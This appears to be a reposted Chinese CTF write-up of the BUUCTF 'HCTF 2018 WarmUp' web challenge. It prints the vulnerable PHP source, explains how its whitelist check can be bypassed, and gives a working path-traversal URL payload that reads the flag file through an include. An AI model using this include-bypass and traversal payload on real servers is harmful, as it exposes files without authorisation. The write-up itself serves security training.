2. 程式人生 > 其它 >[BUUCTF][Web][HCTF 2018]WarmUp 1

[BUUCTF][Web][HCTF 2018]WarmUp 1

阿新 發佈:2022-12-07
這題已經標識為php 程式碼審計題,那麼需要搞到原始碼才行
開啟靶機對應的url,展示的是一張笑臉圖片
右鍵檢視網頁原始碼
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <!--source.php-->
    
    <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
這裡顯示存在一個叫 source.php的檔案
嘗試訪問 source.php
http://2755d30c-1f20-4bf2-856a-c272044674b5.node4.buuoj.cn:81/source.php
居然得到了原始碼
<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

從原始碼可知,存在一個叫hint.php的檔案,同時可以作為file的引數傳入,構造url

http://2755d30c-1f20-4bf2-856a-c272044674b5.node4.buuoj.cn:81/?file=hint.php

得到以下回顯,這裡有重要資訊

flag not here, and flag in ffffllllaaaagggg

這裡有個題眼,flag在ffffllllaaaagggg檔案中,現在就需要構造目錄穿越的滲透方式,來或者這個檔案的內容,這裡可以推測肯定是在上幾層的目錄中,否則很難搞定

繼續閱讀原始碼 checkFile 函式,看有沒有什麼方式可以繞過

// 1.
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
//2.
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

問題就出現在這一段

1處, 首先將傳入的引數以問號處截斷,然後判斷 ?以前的字串是否在白名單中,如果在就通過。

那麼可以構造一個這樣的url試一下
http://2755d30c-1f20-4bf2-856a-c272044674b5.node4.buuoj.cn:81/?file=source.php?./ffffllllaaaagggg

如果沒有通過檢查,原始碼可知,一定會報you can't see it

這個url展示一片空白,那麼說明這個套路沒問題,繼續向上加層級嘗試

 最後得到這個url ok:
 http://2755d30c-1f20-4bf2-856a-c272044674b5.node4.buuoj.cn:81?file=source.php?../../../../../../../../../ffffllllaaaagggg

得到flag
flag{99e0c3c4-e30d-48ea-a8ea-f55603c0ec7f}

相關推薦

[BUUCTF][Web][HCTF 2018]WarmUp 1

這題已經標識為php 程式碼審計題,那麼需要搞到原始碼才行 開啟靶機對應的url,展示的是一張笑臉圖片

Buuctf-Web-[HCTF 2018]WarmUp

前言 刷題地址:https://buuoj.cn/challenges 首先開啟是一個笑臉,檢視原始碼,如下圖發現了,一個檔案

【[HCTF 2018]WarmUp 1BUUCTF

這個題主要是考察程式碼審計,開啟容器      就一張滑稽表情包,我們先檢視網頁原始碼

[HCTF 2018]WarmUp 1

一、涉及漏洞型別 檔案包含漏洞 程式碼審計 二、解題思路 檢視程式碼 =>開啟提示檔案 => 分析程式碼 => 另一提示檔案 => 書寫payload

BUUCTFWEB1:[HCTF 2018]WarmUp

來源:BUUCTF 進入頁面: F12檢視原始碼: <!DOCTYPE html> <html lang=\"en\"> <head>

攻防世界 WEB 高手進階區 HCTF 2018 warmup Writeup

攻防世界 WEB 高手進階區 HCTF 2018 warmup Writeup 題目介紹 題目來源: HCTF 2018 題目描述:warmup

BUUCTF [HCTF 2018]WarmUp

開啟網頁 F12檢視原始碼,發現有個source.php 訪問這個檔案 http://a493ed38-9a1e-42ac-9d38-5028c489a0de.node4.buuoj.cn:81/source.php

CTF程式碼審計之[HCTF 2018]WarmUp

[HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page)

[HCTF 2018]WarmUp

<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { //白名單 $whitelist = [\"source\"=>\"source.php\",\"hint\"=>\"hint.php\"];

BUUCTF之[EIS 2019]EzPOP&BUUCTF[2020 新春紅包題]1 web

BUUCTF之[EIS 2019]EzPOP&BUUCTF[2020 新春紅包題]1 web 兩題是差不多的,只是一個函式稍微修改了,其中一個字尾不能為php,只要通過路徑穿越:filename=\'/../pz.php/.\';

BUUCTF-[HCTF 2018]Hideandseek wp

知識點:軟連結任意檔案讀取、flask session偽造 最開始看到的是這個頁面,嘗試使用admin登入提示you are not admin,猜想是要通過某種方式使用admin登入獲取flag

buuctf-web [強網杯 2019]隨便注 1

啟動靶機,開啟是這個介面 首先輸入1‘,它會報錯 然後輸入1\' order by 2,這說明只有兩個欄位。

buuctf-web Http 1

啟動靶機,開啟環境 開啟之後是這個介面,三個不同的,還蠻有意思的, 然後看這個介面我也看不也啥來,所以只能,檢視一手原始碼了。

buuctf-web Easy MD5 1

啟動靶機 看樣子或許又是存在注入。試了半天沒啥反應,那我就先用bp抓包吧

buuctf-web Hack World 1

我們開啟環境後發現這還是一道sql注入題 我首先隨便試了一下, 先輸入了0 顯示Error Occured When Fetch Result.

buuctf-web HardSQL 1

這或許就是sql最終章了吧 開啟頁面。 還是這種介面,只不過是加強了一下。哈哈哈。

[BUUCTF][Web][ACTF2020 新生賽]Include 1

開啟靶機對應的url 顯示一個tips 超連結 點選訪問超連結,對應Url為 http://469398f2-5677-4270-a4a4-55c5e4a7504a.node4.buuoj.cn:81/?file=flag.php

[BUUCTF][Web][極客大挑戰 2019]Secret File 1

開啟靶機對應的url 右鍵檢視網頁原始碼,檢視到一個訪問路徑 /Archive_room.php 構造url訪問一下

[BUUCTF][Web][極客大挑戰 2019]LoveSQL 1

開啟靶機url,頁面顯示有兩個輸入框,框中輸入123\',發現兩個框都有sql注入問題

[BUUCTF][WEB][極客大挑戰 2019]Http 1

開啟靶機提供的url 右鍵檢視網頁原始碼 發現一個連結 (Secret.php),訪問看看 返回: